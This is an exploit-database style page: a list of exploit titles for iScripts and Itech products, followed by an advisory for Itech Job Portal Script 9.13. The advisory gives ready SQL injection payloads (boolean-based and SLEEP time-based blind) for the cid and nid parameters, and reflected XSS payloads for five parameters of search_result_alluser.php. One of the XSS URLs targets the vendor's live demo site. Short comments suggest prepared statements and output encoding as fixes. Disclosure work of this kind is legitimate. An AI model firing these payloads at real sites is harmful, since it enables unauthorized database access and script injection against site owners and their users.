
4 new exploits iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities iScripts EasyCreate 2.0 - Multiple Vulnerabilities iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /checktransferstatusbck.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal iScripts AutoHoster - 'checktransferstatus.php' SQL Injection iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection iScripts AutoHoster - 'additionalsettings.php' SQL Injection iScripts AutoHoster - 'invno' Parameter SQL Injection iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal Job Portal Script 9.11 - Authentication Bypass Itech Job Portal Script 9.11 - Authentication Bypass Alstrasoft Template Seller Pro 3.25e - 'tempid' Parameter SQL Injection Itech Job Portal Script 9.13 - Multiple Vulnerabilities iScripts AutoHoster 3.0 - 'siteid' Parameter SQL Injection iScripts EasyCreate 3.2 - 'siteid' Parameter SQL Injection
# Exploit Title : Itech Job Portal Script - Multiple Vulnerabilities
# Author : Yunus YILDIRIM (Th3GundY)
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website : http://www.yunus.ninja
# Contact : yunusyildirim@protonmail.com
# Vendor Homepage : http://itechscripts.com/
# Software Link : http://itechscripts.com/job-portal-script/
# Vuln. Version : 9.13
# Demo : http://job-portal.itechscripts.com/
# # # # DETAILS # # # #
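SQL Injections :
# Both payloads below close a quoted string with a single quote, so cid and nid appear to reach the SQL query unescaped. Binding them as prepared-statement parameters (or casting them to integers before use) would close both findings.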
# 1
http://localhost/career_advice_details.php?cid=5
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=5' AND 7504=7504-- zpmu
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: cid=5' OR SLEEP(5)#
# 2
http://localhost/news_details_us.php?nid=1
Parameter: nid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: nid=1' RLIKE (SELECT (CASE WHEN (2796=2796) THEN 1 ELSE 0x28 END))-- WmMl
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: nid=1' OR SLEEP(5)-- UoUN
# # # # # # # # # # # # # # # # # # # # # # # #
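Cross-site scripting (XSS) :
# Every payload below begins with "> , i.e. it breaks out of a quoted HTML attribute, so the listed GET parameters of search_result_alluser.php appear to be echoed into the page without encoding. HTML-encoding them on output (in PHP, htmlspecialchars() with ENT_QUOTES) would address all five.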
# 1
http://localhost/search_result_alluser.php?function="><svg/onload=prompt('CT-Zer0');>
Parameter: function (GET)
Payload: "><svg/onload=prompt('CT-Zer0');>
# 2
http://localhost/search_result_alluser.php?ind="><svg/onload=prompt('CT-Zer0');>
Parameter: ind (GET)
Payload: "><svg/onload=prompt('CT-Zer0');>
# 3
http://localhost/search_result_alluser.php?loc="><svg/onload=prompt('CT-Zer0');>
Parameter: loc (GET)
Payload: "><svg/onload=prompt('CT-Zer0');>
# 4
http://localhost/search_result_alluser.php?compid="><svg/onload=prompt('CT-Zer0');>
Parameter: compid (GET)
Payload: "><svg/onload=prompt('CT-Zer0');>
# 5
http://job-portal.itechscripts.com/search_result_alluser.php?days_chk="><svg/onload=prompt('CT-Zer0');>
Parameter: days_chk (GET)
Payload: "><svg/onload=prompt('CT-Zer0');>